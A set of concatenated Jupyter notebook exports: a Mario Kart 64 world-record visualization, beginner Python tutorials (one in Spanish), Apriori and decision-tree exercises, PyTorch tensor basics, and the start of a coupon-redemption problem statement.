ax.scatter(x="min", y="track", s=160, color=color, edgecolors=color, lw=2, zorder=2, data=df_shortcut)
## Dots shortcut==no – first record
color = colormap_blue(norm_year(df_longdist["year"].values))
ax.scatter(x="min", y="track", s=120, color=WHITE, edgecolors=color, lw=2, zorder=2, data=df_longdist)
## Dots shortcut==no – latest record
ax.scatter(x="max", y="track", s=120, color=WHITE, edgecolors=GREY65, lw=2, zorder=2, data=df_longdist)
# Add labels on the left side of the lollipops -------------------
# Annotations for tracks in df_shortcut
for row in range(df_shortcut.shape[0]):
ax.text(
df_shortcut["min"][row] - 7,
df_shortcut["track"][row],
df_shortcut["track"][row],
ha="right",
va="center",
size=16,
color="black",
fontname="Atlantis"
)
# Annotations for df_longdist, not in df_shortcut
for row in range(df_longdist.shape[0]):
if df_longdist["track"][row] not in df_shortcut["track"].values:
ax.text(
df_longdist["min"][row] - 7,
df_longdist["track"][row],
df_longdist["track"][row],
ha="right",
va="center",
size=17,
color="black",
fontname="Atlantis",
)
# Add labels on top of the first row of lollipops ----------------
# These labels are used to give information about the meaning of
# the different dots without having to use a legend.
# Label dots when shortcut==yes
df_shortcut_wario = df_shortcut.query("track == 'Wario Stadium'")
ax.text(
df_shortcut_wario["min"],
df_shortcut_wario["track"],
"Most recent record\nwith shortcuts\n",
color=BLUE,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
ax.text(
df_shortcut_wario["max"],
df_shortcut_wario["track"],
"First record\nwith shortcuts\n",
color=GREY50,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
# Label dots when shortcut==no
df_longdist_wario = df_longdist.query("track == 'Wario Stadium'")
ax.text(
df_longdist_wario["min"] - 10,
df_longdist_wario["track"],
"Most recent record\nw/o shortcuts\n",
color=BLUE,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
ax.text(
df_longdist_wario["max"] + 10,
df_longdist_wario["track"],
"First record\nw/o shortcuts\n",
color=GREY50,
ma="center",
va="bottom",
ha="center",
size=9,
fontname="Overpass"
)
# Customize the layout -------------------------------------------
# Hide spines
ax.spines["left"].set_visible(False)
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_visible(False)
# Hide y labels
ax.yaxis.set_visible(False)
# Customize x ticks
# * Remove x axis ticks
# * Put labels on both bottom and and top
# * Customize the tick labels. Only the first has the "seconds" appended.
ax.tick_params(axis="x", bottom=True, top=True, labelbottom=True, labeltop=True, length=0)
xticks = np.linspace(0, 400, num=9, dtype=int).tolist()
ax.set_xlim(-60, 400)
ax.set_xticks(xticks)
ax.set_xticklabels(["0 seconds"] + xticks[1:], fontname="Hydrophilia Iced", color=GREY40, size=9)
# Set background color for the subplot.
ax.set_facecolor(WHITE)
# Add thin vertical lines to serve as guide
# 'zorder=0' is important so they stay behind other elements in the plot.
for xtick in xticks:
ax.axvline(xtick, color=GREY94, zorder=0)
# Add vertical space to the vertical limit in the plot
x0, x1, y0, y1 = plt.axis()
plt.axis((x0, x1, y0, y1 + 0.5));
# Add custom legends ---------------------------------------------
# Legend for time difference.
# Recall the 'norm_diff()' created above.
# Create an inset axes with a given width and height.
cbaxes = inset_axes(
ax, width="0.8%", height="44%", loc=3,
bbox_to_anchor=(0.025, 0., 1, 1),
bbox_transform=ax.transAxes
)
cb = fig.colorbar(
ScalarMappable(norm=norm_diff, cmap=colormap_orange), cax=cbaxes,
ticks=[0, 50, 100, 150, 200, 250]
)
# Remove the outline of the colorbar
cb.outline.set_visible(False)
# Set label, playing with labelpad to put it in the right place
cb.set_label(
"Time difference between first and most recent record",
labelpad=-45,
color=GREY40,
size=10,
fontname="Overpass"
)
# Remove ticks in the colorbar with 'size=0'
cb.ax.yaxis.set_tick_params(
color=GREY40,
size=0
)
# Add ticklabels at given positions, with custom font and color
cb.ax.yaxis.set_ticklabels(
[0, 50, 100, 150, 200, 250],
fontname="Hydrophilia Iced",
color=GREY40,
size=10
)
# Legend for year
# We create a custom function to put the Line2D elements into a list
# that then goes into the 'handle' argument of the 'ax.legend()'
years = [2016, 2017, 2018, 2019, 2020, 2021]
def legend_dot(year):
line = Line2D(
[0],
[0],
marker="o",
markersize=10,
linestyle="none",
color=colormap_blue(norm_year(year)),
label=f"{year}"
)
return line
# Store the legend in a name because we use it to modify its elements
years_legend = ax.legend(
title="Year of Record",
handles=[legend_dot(year) for year in years],
loc=3, # lower left
bbox_to_anchor=(0.08, 0, 1, 1),
frameon=False
)
# Set font family, color and size to the elements in the legend
for text in years_legend.get_texts():
text.set_fontfamily("Hydrophilia Iced")
text.set_color(GREY40)
text.set_fontsize(10)
# Same modifications, but applied to the title.
legend_title = years_legend.get_title()
legend_title.set_fontname("Overpass")
legend_title.set_color(GREY40)
legend_title.set_fontsize(10)
# The suptitle acts as the main title.
# Play with 'x' and 'y' to get them in the place you want.
plt.suptitle(
"Let's-a-Go! You May Still Have Chances to Grab a New World Record for Mario Kart 64",
fontsize=13,
fontname="Atlantis Headline",
weight="bold",
x = 0.457,
y = 0.99
)
subtitle = [
"Most world records for Mario Kart 64 were achieved pretty recently (13 in 2020, 10 in 2021). On several tracks, the players considerably improved the time needed to complete three laps when they used shortcuts (Choco Mountain,",
"D.K.'s Jungle Parkway, Frappe Snowland, Luigi Raceway, Rainbow Road, Royal Raceway, Toad's Turnpike, Wario Stadium, and Yoshi Valley). Actually, for three out of these tracks the previous records were more than halved since 2020",
"(Luigi Raceway, Rainbow Road, and Toad's Turnpike). Four other tracks still have no records for races with shortcuts (Moo Moo Farm, Koopa Troopa Beach, Banshee Boardwalk, and Bowser's Castle). Are there none or did nobody find",
"them yet? Pretty unrealistic given the fact that since more than 24 years the game is played all around the world—but maybe you're able to find one and obtain a new world record?"
]
# And the axis title acts as a subtitle.
ax.set_title(
"\n".join(subtitle),
loc="center",
ha="center",
ma="left",
color=GREY40,
fontname="Overpass",
fontsize=9,
pad=20
)
# Add credit line
fig.text(
0.8, .05, "Visualization: Cédric Scherer • Data: mkwrs.com/mk64",
fontname="Overpass",
fontsize=12,
color=GREY55,
ha="center"
)
# Set figure's background color, to match subplot background color.
fig.patch.set_facecolor(WHITE)
# Finally, save the plot!
plt.savefig(
"mario-kart-64-world-records.png",
facecolor=WHITE,
dpi=300,
bbox_inches="tight",
pad_inches=0.3
)
###Output
_____no_output_____ |
Dia_1/Dia_1_grupo1/.ipynb_checkpoints/Dia_1-_Paula-checkpoint.ipynb | ###Markdown
IPython Notebook Fernando Pérez, the Colombian who created IPython, one of the most important Python interfaces in the world over the last 10 years. https://en.wikipedia.org/wiki/Fernando_P%C3%A9rez_(software_developer) https://pybonacci.es/2013/05/16/entrevista-a-fernando-perez-creador-de-ipython/ http://fperez.org/personal.html An example of what you can achieve: http://nbviewer.jupyter.org/github/glue-viz/example_data_viewers/blob/master/mario/mario.ipynb Mathematical Operations **Addition**: $2+3$
###Code
2+3
###Output
_____no_output_____
###Markdown
**Multiplication**: $2 \times 3$
###Code
2*3
###Output
_____no_output_____
###Markdown
**Division**: $\frac{2}{3}$
###Code
2/3
###Output
_____no_output_____
###Markdown
**Power**: $2^{3}$
###Code
2**3
###Output
_____no_output_____
###Markdown
Trigonometric Functions In the following cells we will compute the values of functions that are common in our math classes. To do this, we need to import the numpy library.
###Code
# Import a library in Python
import numpy as np # "as np" assigns a shorter alias to the library so it is faster to type
np.sin(3)
(np.sin(3))*(np.sin(2))
###Output
_____no_output_____
###Markdown
Logarithm and Exponential: $\ln(3)$, $e^{3}$
###Code
np.log(3)
np.exp(3)
###Output
_____no_output_____
###Markdown
Programming Challenge - Solve the equation $$x^2 - x - 12 = 0$$ - Find the hypotenuse and the angles of the right triangle with legs a = 4 and b = 5. Variables A variable is a space for storing modifiable or constant values.----```pythonnombre_de_la_variable = valor_de_la_variable```---**The different types of variables are:** **Integers (**`int`**): 1, 2, 3, -10, -103** **Continuous numbers (**`float`**): 0.666, -10.678** **Text strings (**`str`**): 'clubes', 'clubes de ciencia', 'Roberto'** **Boolean (True / False): `True`, `False`**
###Code
# Example
a = 5
print (a) # Print my variable
###Output
5
###Markdown
Variable of type `int`
###Code
b = -15
print (b)
###Output
-15
###Markdown
Variable of type `float`
###Code
c = 3.1416
print (c)
###Output
3.1416
###Markdown
Variable of type `str`
###Code
d = 'clubes de ciencia'
print (d)
###Output
clubes de ciencia
###Markdown
Variable of type `bool`
###Code
e = False
print (e)
###Output
False
###Markdown
How do I find out the type of a variable? By using the `type` function:```pythontype(nombre_de_la_variable)```
###Code
print (type(a))
print (type(b))
print (type(c))
print (type(d))
print (type(e))
###Output
<class 'int'>
<class 'int'>
<class 'float'>
<class 'str'>
<class 'bool'>
###Markdown
Programming Challenge Variables for storing collections of data > **Python has 3 more complex variable types that can store collections of data such as the ones seen above** - Lists - Tuples - Dictionaries Lists Lists let you store collections of data of different types:```pythonint; str; float; bool```A list is created as follows:```pythonnombre_de_la_lista = [valor_1, valor_2, valor_3]```The values in a list can be modified.
###Code
# Example
mi_lista = [1,2,3,5,6,-3.1416]
mi_lista_diversa = [1,2,'clubes', 'de', 'ciencia', 3.1416, False]
print (mi_lista)
print (mi_lista_diversa)
###Output
[1, 2, 3, 5, 6, -3.1416]
[1, 2, 'clubes', 'de', 'ciencia', 3.1416, False]
###Markdown
How can I look at an element or elements of my list? To read the element at position `n`, use:```pythonmi_lista[n]```
###Code
# Example
print (mi_lista[0]) # Read the first element, located at position n=0
print (mi_lista_diversa[0])
print (type(mi_lista[5])) # Read the type of the variable at position n=5
###Output
1
1
<class 'float'>
###Markdown
**How to read the elements between positions n and m?**```pythonmi_lista[n:m+1]```
###Code
#Example
print (mi_lista[0:3]) # Read between n=0 and m=2
###Output
[1, 2, 3]
###Markdown
Reto de Programación TuplasLas tuplas permiten guardar colecciones de datos de diferentes tipos:```pythonint; str; float; bool```Una tupla se crea de la siguiente forma:```pythonmi_tupla = ('cadena de texto', 15, 2.8, 'otro dato', 25)```Los valores de una tupla no pueden ser modificados. Sus elementos se leen como en las listas
###Code
#Example
mi_tupla = ('cadena de texto', 15, 2.8, 'otro dato', 25)
print (mi_tupla)
print (mi_tupla[2]) # read the third element of the tuple
print (mi_tupla[2:4]) # read the last two elements of the tuple
###Output
('cadena de texto', 15, 2.8, 'otro dato', 25)
2.8
(2.8, 'otro dato')
###Markdown
Reto de Programación DiccionariosMientras que en las listas y tuplas se accede a los elementos por un número de indice, en los diccionarios se utilizan claves(numericas ó de texto) para acceder a los elementos. Los elementos guardados en cada clave son de diferentes tipos, incluso listas u otros diccionarios.```pythonint; str; float; bool, list, dict```Una diccionario se crea de la siguiente forma:```pythonmi_diccionario = {'grupo_1':4, 'grupo_2':6, 'grupo_3':7, 'grupo_4':3}```Acceder al valor de la clave `grupo_2`:```pythonprint (mi_diccionario['grupo_2'])```
###Code
# Example 1
mi_diccionario = {'grupo_1':4, 'grupo_2':6, 'grupo_3':7, 'grupo_4':3}
print (mi_diccionario['grupo_2'])
# Example 2 with different types of elements
informacion_persona = {'nombres':'Elon', 'apellidos':'Musk', 'edad':45, 'nacionalidad':'Sudafricano',
'educacion':['Administracion de empresas','Física'],'empresas':['Zip2','PyPal','SpaceX','SolarCity']}
print (informacion_persona['educacion'])
print (informacion_persona['empresas'])
###Output
['Administracion de empresas', 'Física']
['Zip2', 'PyPal', 'SpaceX', 'SolarCity']
###Markdown
Reto de Programación Estructuras de control condicionalesLas estructuras de control condicionales nos permiten evaluar si una o mas condiciones se cumplen, y respecto a estoejecutar la siguiente accion.Primero usamos:```pythonif```Despues algun operador relacional para comparar```python== igual que!= diferente de < menor que> mayor que<= menor igual que>= mayor igual que```Cuando se evalua mas de una conición:```pythonand, & (y)or, | (ó)```
###Code
# Example
color_semaforo = 'amarillo'
if color_semaforo == 'verde':
print ("Cruzar la calle")
else:
print ("Esperar")
# example
dia_semana = 'lunes'
if dia_semana == 'sabado' or dia_semana == 'domingo':
print ('Me levanto a las 10 de la mañana')
else:
print ('Me levanto antes de las 7am')
# Example
costo_compra = 90
if costo_compra <= 100:
print ("Pago en efectivo")
elif costo_compra > 100 and costo_compra < 300:
print ("Pago con tarjeta de débito")
else:
print ("Pago con tarjeta de crédito")
###Output
_____no_output_____
###Markdown
Reto de Programación Estructuras de control iterativas(cíclicas o bucles)Estas estructuras nos permiten ejecutar un mismo codigo, de manera repetida, mientras se cumpla una condición. Bucle WhileEste bucle ejecuta una misma acción mientras determinada condición se cumpla:```pythonanio = 2001while anio <= 2012: print ("Informes del Año", str(anio)) anio = anio + 1 aumentamos anio en 1```En este ejemplo la condición es menor que 2012
###Code
# example
anio = 2001
while anio <= 2012:
print ("Informes del Año", str(anio))
    anio = anio + 1 # increase anio by 1
# example
cuenta = 10
while cuenta >= 0:
print ('faltan '+str(cuenta)+' minutos')
cuenta += -1
###Output
faltan 10 minutos
faltan 9 minutos
faltan 8 minutos
faltan 7 minutos
faltan 6 minutos
faltan 5 minutos
faltan 4 minutos
faltan 3 minutos
faltan 2 minutos
faltan 1 minutos
faltan 0 minutos
###Markdown
Reto de Programación Bucle forEn Python el bucle for nos permite iterar sobre variables que guardan colecciones de datos, como : tuplas y listas.```pythonmi_lista = ['Juan', 'Antonio', 'Pedro', 'Herminio']for nombre in mi_lista: print (nombre)```En el codigo vemos que la orden es ir por cada uno de los elementos de la lista para imprimirlos.
###Code
# Example
mi_tupla = ('rosa', 'verde', 'celeste', 'amarillo')
for color in mi_tupla:
print (color)
# Example
dias_semana = ['lunes','martes','miercoles','jueves','viernes','sabado','domingo']
for i in dias_semana:
if (i == dias_semana[-1]) or (i == dias_semana[-2]):
print ('Hoy seguire aprendiendo de programación')
else:
print ('Hoy tengo que ir al colegio')
###Output
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy tengo que ir al colegio
Hoy seguire aprendiendo de programación
Hoy seguire aprendiendo de programación
|
Association Rule Learning (Recommending Models)/Apriori/Apiori.ipynb | ###Markdown
**Apriori** For building a recommender system. Importing Libraries
###Code
!pip install apyori
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
###Output
_____no_output_____
###Markdown
Uploading Dataset
###Code
from google.colab import files
files.upload()
###Output
_____no_output_____
###Markdown
Data Preprocessing
###Code
dataset = pd.read_csv('Market_Basket_Optimisation.csv', header = None)
transactions = []
for i in range(0, 7501):
transactions.append([str(dataset.values[i,j]) for j in range(0, 20)])
print(transactions)
###Output
_____no_output_____
###Markdown
Training the Apriori Model. min_support = 3*7/7501 ≈ 0.003 (assuming the 7501 transactions span one week, this corresponds to items bought at least 3 times per day).
###Code
from apyori import apriori
rules = apriori(transactions = transactions, min_support= 0.003, min_confidence = 0.2, min_lift = 3, min_length = 2, max_length = 2)
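# apyori.apriori returns a generator, so it is materialized with list() below
# before being inspected more than once.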
###Output
_____no_output_____
###Markdown
Visualising the results

Displaying the first results coming directly from the output of the apriori function.
###Code
results = list(rules)
results
def inspect(results):
    # apyori returns RelationRecords: (items, support, ordered_statistics);
    # ordered_statistics[0] holds (items_base, items_add, confidence, lift)
    lhs = [tuple(result[2][0][0])[0] for result in results]
    rhs = [tuple(result[2][0][1])[0] for result in results]
    supports = [result[1] for result in results]
    confidences = [result[2][0][2] for result in results]
    lifts = [result[2][0][3] for result in results]
    return list(zip(lhs, rhs, supports, confidences, lifts))
resultsinDataFrame = pd.DataFrame(inspect(results), columns = ['Left Hand Side', 'Right Hand Side', 'Support', 'Confidence', 'Lift'])
###Output
_____no_output_____
###Markdown
Displaying the unsorted results
###Code
resultsinDataFrame
###Output
_____no_output_____
###Markdown
Displaying the results sorted by descending lifts
###Code
resultsinDataFrame.nlargest(n = 10, columns = 'Lift')
###Output
_____no_output_____ |
Decision_Tree/Loan_Defaulters_Student_Template.ipynb | ###Markdown
Load the dataset
- Load the train data and, using all your knowledge, try to explore the different statistical properties of the dataset.
###Code
# Code starts here
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.preprocessing import LabelEncoder
from sklearn.tree import DecisionTreeClassifier

train = pd.read_csv("train.csv")
# drop serial number
train.drop(columns=['Id', 'customer.id'],inplace=True)
print(train.head())
# Code ends here
###Output
credit.policy purpose int.rate installment log.annual.inc \
0 Yes debt_consolidation 12.53% 689.41 11.513725
1 Yes credit_card 10.20% 485.42 10.315597
2 Yes debt_consolidation 12.87% 121.08 11.238436
3 No all_other 15.37% 348.47 11.142007
4 Yes debt_consolidation 14.61% 344.76 10.308953
dti fico days.with.cr.line revol.bal revol.util pub.rec \
0 14.45 722 4291.000000 13171 51.8 0
1 12.87 752 5789.958333 14857 31.3 0
2 1.58 692 3391.000000 12135 85.5 0
3 11.01 687 5370.000000 10631 35.3 0
4 11.36 672 2429.958333 10544 57.0 0
inq.last.6mths delinq.2yrs paid.back.loan
0 Less than 5 No Yes
1 Less than 5 Yes Yes
2 Less than 5 No Yes
3 Less than 10 No Yes
4 Less than 5 Yes Yes
###Markdown
Visualize the data
- Check for the categorical & continuous features.
- Check out the best plots for plotting between the categorical target and continuous features, and try making some inferences from these plots.
- Clean the data, apply some data preprocessing and engineering techniques.
###Code
# Code starts here
# Check the distribution of the target variable
#Storing value counts of target variable in 'fully_paid'
fully_paid=train['paid.back.loan'].value_counts()
#Plotting bar plot
plt.bar(fully_paid.index, fully_paid)
plt.show()
# From the column int.rate of 'train', remove the % character and convert the column into float.
# After that divide the values of 'int.rate' with 100 and store the result back to the column 'int.rate'
#Removing the last character from the values in column
train['int.rate'] = train['int.rate'].map(lambda x: str(x)[:-1])
#Dividing the column values by 100
train['int.rate']=train['int.rate'].astype(float)/100
#Storing all the numerical type columns in 'num_df'
num_df=train.select_dtypes(include=['number']).copy()
#Storing all the categorical type columns in 'cat_df'
cat_df=train.select_dtypes(include=['object']).copy()
# Visualizing Numerical Features
#Setting the figure size
plt.figure(figsize=(20,20))
#Storing the columns of 'num_df'
cols=list(num_df.columns)
print(cols)
#Creating subplots
fig,axes=plt.subplots(9,1, figsize=(10,20))
#Looping across rows
for i in range(9):
#Plotting boxplot
sns.boxplot(x=train['paid.back.loan'],y=num_df[cols[i]],ax=axes[i])
#Avoiding subplots overlapping
fig.tight_layout()
# Visualizing Categorical Features
#Storing the columns of 'cat_df'
cols=list(cat_df.columns)
#Setting up subplots
fig,axes=plt.subplots(2,2, figsize=(20,20))
#Looping through rows
for i in range(0,2):
#Looping through columns
for j in range(0,2):
#Plotting count plot
sns.countplot(x=train[cols[i*2+j]], hue=train['paid.back.loan'],ax=axes[i,j])
#Avoiding subplots overlapping
fig.tight_layout()
###Output
_____no_output_____
###Markdown
Model building
- Separate the features and target.
- Now let's come to the actual task: using a Decision Tree, predict `paid.back.loan`. Use the different techniques you have learned to improve the performance of the model.
- Try improving upon the `accuracy_score` ([Accuracy Score](https://scikit-learn.org/stable/modules/generated/sklearn.metrics.accuracy_score.html))
###Code
# Code Starts here
# Split the data into train and test
X = train.drop(columns = ['paid.back.loan'])
y = train[['paid.back.loan']]
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=3)
# Initializing a list of categorical columns & dropping the target column from the list
cat_cols = list(cat_df.columns)
cat_cols.remove('paid.back.loan')  # list.remove() mutates in place and returns None
#Looping through categorical columns
for col in cat_cols:
#Filling null values with 'NA'
X_train[col].fillna('NA',inplace=True)
#Initalising a label encoder object
le=LabelEncoder()
#Fitting and transforming the column in X_train with 'le'
X_train[col]=le.fit_transform(X_train[col])
#Filling null values with 'NA'
X_test[col].fillna('NA',inplace=True)
#Fitting the column in X_test with 'le'
X_test[col]=le.transform(X_test[col])
# Replacing the values of y_train
y_train.replace({'No':0,'Yes':1},inplace=True)
# Replacing the values of y_test
y_test.replace({'No':0,'Yes':1},inplace=True)
#Initialising 'Decision Tree' model
model=DecisionTreeClassifier(random_state=0)
#Training the 'Decision Tree' model
model.fit(X_train, y_train)
#Finding the accuracy of 'Decision Tree' model
acc=model.score(X_test, y_test)
#Printing the accuracy
print("Accuracy: ", acc)
# Code ends here
# Let's see if pruning of decision tree improves its accuracy. We will use grid search to do the optimum pruning.
#Parameter grid
parameter_grid = {'max_depth': np.arange(3,10), 'min_samples_leaf': range(10,50,10)}
#Code starts here
#Initialising 'Decision Tree' model
model_2 = DecisionTreeClassifier(random_state=0)
#Applying Grid Search of hyper-parameters and finding the optimum 'Decision Tree' model
p_tree = GridSearchCV(model_2, parameter_grid, cv=5)
#Training the optimum 'Decision Tree' model
p_tree.fit(X_train, y_train)
#Finding the accuracy of the optimum 'Decision Tree' model
acc_2 = p_tree.score(X_test, y_test)
#Printing the accuracy
print("Accuracy: ", acc_2)
###Output
Accuracy: 0.8316659417137886
###Markdown
Prediction on the test data and creating the sample submission file.
- Load the test data and store the `Id` column in a separate variable.
- Perform the same operations on the test data that you have performed on the train data.
- Create the submission file as a `csv` file consisting of the `Id` column from the test data and your prediction as the second column.
###Code
# Code Starts here
# Prediction on test data
# Read the test data
test = pd.read_csv('test.csv')
# Storing the id from the test file
id_ = test['Id']
# Apply the transformations on test
test.drop(columns=['Id', 'customer.id'],inplace=True)
#Removing the last character from the values in column
test['int.rate'] = test['int.rate'].map(lambda x: str(x)[:-1])
#Dividing the column values by 100
test['int.rate']=test['int.rate'].astype(float)/100
for col in cat_cols:
#Filling null values with 'NA'
test[col].fillna('NA',inplace=True)
#Initalising a label encoder object
le=LabelEncoder()
#Fitting and transforming the column in test with 'le'
le.fit(train[col])
test[col]=le.transform(test[col])
# Predict on the test data
y_pred_test = p_tree.predict(test)
y_pred_test = y_pred_test.flatten()
# Create a sample submission file
sample_submission = pd.DataFrame({'Id':id_,'paid.back.loan':y_pred_test})
print(sample_submission.head())
# Replacing the values of sample_submission
sample_submission.replace({1:'Yes', 0: 'No'},inplace=True)
# Convert the sample submission file into a csv file
sample_submission.to_csv('sample_submission_test.csv',index=False)
# Code ends here
###Output
Id paid.back.loan
0 5468 1
1 7530 1
2 501 1
3 2690 1
4 3691 1
|
source/full_code/basic_python_part1.ipynb | ###Markdown
Python 101 : Basic Python Programming [Part 1]
by Limpapat Bussaban, 22/08/2021
[datacamp] Cheat sheets: http://datacamp-community-prod.s3.amazonaws.com/0eff0330-e87d-4c34-88d5-73e80cb955f2

Variables
```
variable = expression
```
Variable types
```
number --> int, float
string
boolean
```
Keywords based on Python version 3.7
```
False     await     else      import    pass
None      break     except    in        raise
True      class     finally   is        return
and       continue  for       lambda    try
as        def       from      nonlocal  while
assert    del       global    not       with
async     elif      if        or        yield
```
###Code
# Int
a = 1
a
# This is comment
a = 1
(float(a) - 1)*99
# Float
float(a)
# String
str(a)
str(a) + "1"
bool(a)
bool(None)
type(a)
b = "Python!"
b
###Output
_____no_output_____
###Markdown
Basic operators
* Arithmetic Operators ```+ - * / % ** //```
* Comparison (Relational) Operators ```== != > < >= <=```
* Assignment Operators ```= += -= *= /= %= **= //=```
* Logical Operators ```and or not```
* Bitwise Operators ```& | ^ ~ << >>```
* Membership Operators ```in, not in```
* Identity Operators ```is, is not```

A short demo of a few of these operators is shown below.
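A minimal sketch (not part of the original notebook) exercising a few of the operators listed above:
```python
x, y = 7, 3
print(x // y, x % y, x ** y)      # floor division, modulo, power -> 2 1 343
print(x >= y and not y > x)       # comparison and logical operators -> True
print(3 in [1, 2, 3], x is y)     # membership and identity -> True False
```

Collections

String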
###Code
sentence = " Hello Corgi. I am hungry. "
len(sentence)
sentence[1]
sentence[1:12]
sentence.strip()
len(sentence.strip())
sentence.strip().split(' ')
ss = ' '.join(sentence.strip().split(' '))
ss
###Output
_____no_output_____
###Markdown
List
```
list = [...]
```
###Code
l = [b, a, a - 1, a]
l
len(l)
l[3] = 0
l
# IndexError: list assignment index out of range
l[4] = ":)"
l
l.append(":)")
l
len(l)
l.pop() #list.pop(index)
l
l.pop(3)
l
###Output
_____no_output_____
###Markdown
Tuple
```
tuple = (...)
```
###Code
t = (0, 1, 2, 3, 4)
t
len(t)
t[0:3]
t[-1]
t[-3:]
# TypeError: Cannot edit tuple.
t[4] = 5
###Output
_____no_output_____
###Markdown
Set
```
set = {...}
```
###Code
s = {1, 1, 2, 2, 2, 3, 3, 3, 3, 3, 4, 5, 5}
s
len(s)
0 in s
1 not in s
s1 = {5, 6, 6, 7}
print('s = ', s)
print('s1 = ', s1)
print('s is a subset of s1 : ', s <= s1)
print('s union s1 = ', s | s1)
print('s intersect s1 = ', s & s1)
print('s difference s1', s - s1)
print('s symetric difference s1 = ', s ^ s1)
###Output
s = {1, 2, 3, 4, 5}
s1 = {5, 6, 7}
s is a subset of s1 : False
s union s1 = {1, 2, 3, 4, 5, 6, 7}
s intersect s1 = {5}
s difference s1 {1, 2, 3, 4}
s symetric difference s1 = {1, 2, 3, 4, 6, 7}
###Markdown
Dictionary
```
dict = {key : value}
```
###Code
grade = {
"A" : 80,
"B" : 70,
"C" : 60,
"D" : 50
}
grade
grade["A"]
grade["B+"] = 75
grade
d = {}
d["s001"] = "Dog"
d["s002"] = "Cat"
d
d["s001"]
###Output
_____no_output_____
###Markdown
Print

Print in more detail: https://realpython.com/python-print/
###Code
?print
name = 'Limpapat'
age = 16
gpa = 10/3
print('Hi! \nMy name is', name, ', \nI\'m', age, 'years old, \nMy GPA:', gpa, '.')
print('Hi! \nMy name is %s, \nI\'m %d years old, \nMy GPA: %.2f' %(name, age, gpa))
print('Hi! \nMy name is {}, \nI\'m {} years old, \nMy GPA: {}.'.format(name, age, gpa))
print(f'Hi! \nMy name is {name}, \nI\'m {age} years old, \nMy GPA: {gpa}.')
###Output
Hi!
My name is Limpapat,
I'm 16 years old,
My GPA: 3.3333333333333335.
|
Chapter_3/Chapter_3.ipynb | ###Markdown
CHAPTER 3 Section 1 Playing with PyTorch tensors
###Code
import torch
data = torch.ones(3)
data
data[0], data[1]
float(data[0]), float(data[1])
data[1] = 4 # mutable
data
a = torch.tensor([4, 5, 6, 7])
a
a.dtype
float(a[2])
p = torch.tensor([[4, 2], [4, 5.6], [1.3, 13]], dtype=torch.float64)
p
p.shape
p[0]
p[0, 0], p[0, 1]
p[:, 0] # all rows, first column
p[None].shape
# example image
img = torch.rand(3, 28, 28) * 255 # channels x rows x columns
img
w = torch.tensor([0.2126, 0.7152, 0.0722])
batch = torch.rand(2, 3, 28, 28) * 255 # 2 is the number of examples
batch.shape
img.mean(-3).shape, batch.mean(-3).shape
w_un = w.unsqueeze(-1).unsqueeze(-1)
w_un.shape
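# broadcasting note: w_un has shape (3, 1, 1), so it lines up with the channel
# axis of img (3, 28, 28) and of batch (2, 3, 28, 28), scaling each channel by
# its grayscale weight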
img_weights = w_un * img
batch_weights = w_un * batch
img_weights.shape, batch_weights.shape
%matplotlib inline
import matplotlib
import numpy as np
import matplotlib.pyplot as plt
img_gray = img_weights.sum(-3)
batch_gray = batch_weights.sum(-3)
img_gray.shape, batch_gray.shape
# trying to plot the images
from pylab import rcParams
rcParams['figure.figsize'] = 50, 50
# note: Tensor.resize() only reshapes the underlying storage and scrambles the
# channels; permute() actually moves the channel axis last, as imshow expects
img_n = img.permute(1, 2, 0) / 255         # (3, 28, 28) -> (28, 28, 3), scaled to [0, 1]
batch_n = batch.permute(2, 3, 1, 0) / 255  # (2, 3, 28, 28) -> (28, 28, 3, 2)
plt.subplot(2, 3, 1)
plt.title("Image color", fontsize=30)
fig = plt.imshow(img_n)
plt.subplot(2, 3, 2)
plt.title("Batch 1 color", fontsize=30)
plt.imshow(batch_n[..., 0])
plt.subplot(2, 3, 3)
plt.title("Batch 2 color", fontsize=30)
plt.imshow(batch_n[..., 1])
plt.subplot(2, 3, 4)
plt.title("Image grayscale", fontsize=30)
fig = plt.imshow(img_gray)
batch_n = batch_gray.permute(1, 2, 0)  # (2, 28, 28) -> (28, 28, 2)
plt.subplot(2, 3, 5)
plt.title("Batch 1 grayscale", fontsize=30)
plt.imshow(batch_n[..., 0])
plt.subplot(2, 3, 6)
plt.title("Batch 2 grayscale", fontsize=30)
plt.imshow(batch_n[..., 1])
plt.show()
# different dtypes in pytorch
torch.int8, torch.int16, torch.int32, torch.int64
torch.float, torch.float16, torch.float32, torch.float64
torch.bool
# TO CHANGE THE DTYPE TWO METHODS ARE THERE
print(p.dtype)
print(p.int().dtype)
print(p.to(torch.int64).dtype)
# trying to understand the underlying storage working of tensors
print(p)
p.storage() # storage is where the data is stored in a 1D array (always)
# regardless of the tensor's dimension
st = p.storage()
st[3] = 13123123123
# this will change the actual tensor too
print(st)
p
# methods with a trailing _ changes the tensor being operated on
# instead of creating a new copy with the change
p.zero_()
p
p = torch.rand(2, 4).to(dtype=torch.float32)
p
p.t() # shorthand transpose function
p.is_contiguous()
# tensor to numpy
n = p.numpy()
n
# numpy to tensor
f = torch.from_numpy(n)
f
# saving tensors
torch.save(p, '../Chapter_3/p.t')
# reading tensors from file
p_n = torch.load('../Chapter_3/p.t')
p_n
###Output
_____no_output_____ |
.ipynb_checkpoints/ML on Amex Dataset Final-checkpoint.ipynb | ###Markdown
Problem Statement: Predicting Coupon Redemption

XYZ Credit Card company regularly helps its merchants understand their data better and take key business decisions accurately by providing machine learning and analytics consulting. ABC is an established brick & mortar retailer that frequently conducts marketing campaigns for its diverse product range. As a merchant of XYZ, they have asked XYZ to assist them in their discount marketing process using the power of machine learning. Can you wear the AmExpert hat and help out ABC?

Discount marketing and coupon usage are very widely used promotional techniques to attract new customers and to retain & reinforce the loyalty of existing customers. The measurement of a consumer's propensity towards coupon usage and the prediction of redemption behaviour are crucial parameters in assessing the effectiveness of a marketing campaign.

